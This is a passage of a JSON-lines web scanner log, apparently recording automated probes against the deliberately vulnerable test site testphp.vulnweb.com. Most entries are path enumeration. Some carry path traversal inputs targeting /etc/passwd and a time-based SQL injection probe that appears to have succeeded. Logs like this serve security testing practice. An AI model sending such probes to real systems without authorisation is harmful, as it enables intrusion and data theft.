.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":496,\"lines\":107,\"status_code\":200,\"content_length\":4853,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:26.173110656Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?file=../\",\"input\":\"http://testphp.vulnweb.com/artists.php?file=../\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?file=../\",\"time\":\"354.703241ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":503,\"lines\":105,\"status_code\":200,\"content_length\":5328,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:26.311417498Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?file=../../../admin.php\",\"input\":\"http://testphp.vulnweb.com/artists.php?file=../../../admin.php\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?file=../../../admin.php\",\"time\":\"351.857148ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":503,\"lines\":105,\"status_code\":200,\"content_length\":5328,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:27.985412785Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?file=../../../etc/passwd\",\"input\":\"http://testphp.vulnweb.com/artists.php?file=../../../etc/passwd\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?file=../../../etc/passwd\",\"time\":\"349.560261ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":503,\"lines\":105,\"status_code\":200,\"content_length\":5328,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:29.059055756Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(3)\",\"input\":\"http://testphp.vulnweb.com/artists.php?artist=1-SLEEP(3)\",\"title\":\"artists\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.php?artist=1-SLEEP(3)\",\"time\":\"9.345356455s\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":701,\"lines\":124,\"status_code\":200,\"content_length\":6251,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:29.340226986Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.phpA01\",\"input\":\"http://testphp.vulnweb.com/artists.phpA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.phpA01\",\"time\":\"346.797629ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:29.643140243Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/artists.phpUser-Agent:\",\"input\":\"http://testphp.vulnweb.com/artists.phpUser-Agent:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/artists.phpUser-Agent:\",\"time\":\"363.617917ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:30.379152401Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/axvdigital\",\"input\":\"http://testphp.vulnweb.com/axvdigital\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/axvdigital\",\"time\":\"347.942867ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:30.411453908Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/babymagazinetoday.com\",\"input\":\"http://testphp.vulnweb.com/babymagazinetoday.com\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/babymagazinetoday.com\",\"time\":\"348.631368ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:30.467231916Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/bestpicktech.com\",\"input\":\"http://testphp.vulnweb.com/bestpicktech.com\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/bestpicktech.com\",\"time\":\"343.565812ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:30.497249729Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/bit.ly/2TN5d3Y\",\"input\":\"http://testphp.vulnweb.com/bit.ly/2TN5d3Y\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/bit.ly/2TN5d3Y\",\"time\":\"357.06671ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:30.550248423Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/bookshn.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/bookshn.blogspot.com/\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/bookshn.blogspot.com/\",\"time\":\"352.020152ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:30.73372582Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/bxss/\",\"input\":\"http://testphp.vulnweb.com/bxss/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/bxss/\",\"time\":\"347.908596ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":19,\"lines\":3,\"status_code\":200,\"content_length\":102,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:30.853132902Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"input\":\"http://testphp.vulnweb.com/bxss/adminPan3l/\",\"title\":\"Administrative panel\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/bxss/adminPan3l/\",\"time\":\"343.660293ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":110,\"lines\":20,\"status_code\":200,\"content_length\":767,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:30.919092748Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l/index.php\",\"input\":\"http://testphp.vulnweb.com/bxss/adminPan3l/index.php\",\"title\":\"Administrative panel\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/bxss/adminPan3l/index.php\",\"time\":\"348.789533ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":110,\"lines\":20,\"status_code\":200,\"content_length\":767,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:30.941975155Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/bxss/adminPan3l/style.css\",\"input\":\"http://testphp.vulnweb.com/bxss/adminPan3l/style.css\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/css\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/bxss/adminPan3l/style.css\",\"time\":\"348.615835ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":50,\"lines\":39,\"status_code\":200,\"content_length\":615,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:30.982693489Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/bxss/cleanDatabase.php\",\"input\":\"http://testphp.vulnweb.com/bxss/cleanDatabase.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/bxss/cleanDatabase.php\",\"time\":\"373.136574ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":50,\"lines\":5,\"status_code\":200,\"content_length\":396,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:31.042522828Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/bxss/database_connect.php\",\"input\":\"http://testphp.vulnweb.com/bxss/database_connect.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/bxss/database_connect.php\",\"time\":\"355.467212ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":27,\"lines\":3,\"status_code\":200,\"content_length\":220,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:31.20004333Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/bxss/index.php\",\"input\":\"http://testphp.vulnweb.com/bxss/index.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/bxss/index.php\",\"time\":\"342.586602ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":19,\"lines\":3,\"status_code\":200,\"content_length\":102,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:31.278122367Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/bxss/test.js\",\"input\":\"http://testphp.vulnweb.com/bxss/test.js\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/bxss/test.js\",\"time\":\"352.613963ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":19,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:31.290054707Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/bxss/vuln.php?id=1\",\"input\":\"http://testphp.vulnweb.com/bxss/vuln.php?id=1\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/bxss/vuln.php?id=1\",\"time\":\"349.622172ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":50,\"lines\":5,\"status_code\":200,\"content_length\":396,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:31.34190013Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/cart.php\",\"input\":\"http://testphp.vulnweb.com/cart.php\",\"title\":\"you cart\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/cart.php\",\"time\":\"348.820303ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":502,\"lines\":109,\"status_code\":200,\"content_length\":4903,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:31.547948897Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/cart.php3\",\"input\":\"http://testphp.vulnweb.com/cart.php3\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/cart.php3\",\"time\":\"356.748711ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:34.765650573Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/cart.php3L\",\"input\":\"http://testphp.vulnweb.com/cart.php3L\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/cart.php3L\",\"time\":\"352.111465ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:34.861520623Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/cart.phpA01\",\"input\":\"http://testphp.vulnweb.com/cart.phpA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/cart.phpA01\",\"time\":\"347.170463ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:34.968739246Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php\",\"input\":\"http://testphp.vulnweb.com/categories.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php\",\"time\":\"352.847742ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:35.017390819Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.phpВы\",\"input\":\"http://testphp.vulnweb.com/categories.php%D0%92%D1%8B\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php%D0%92%D1%8B\",\"time\":\"353.091289ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:35.388002746Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php)\",\"input\":\"http://testphp.vulnweb.com/categories.php)\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php)\",\"time\":\"356.141567ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:35.745025931Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/artists.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/artists.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/artists.php\",\"time\":\"345.009152ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:35.755325609Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/index.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/index.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/index.php\",\"time\":\"357.349039ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:36.018640566Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/cart.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/cart.php\",\"title\":\"picture categories\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/cart.php\",\"time\":\"354.359684ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"DreamWeaver\",\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":656,\"lines\":117,\"status_code\":200,\"content_length\":6115,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:23:36.544452167Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/categories.php\",\"input\":\"http://testphp.vulnweb.com/categories.php/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/AJAX/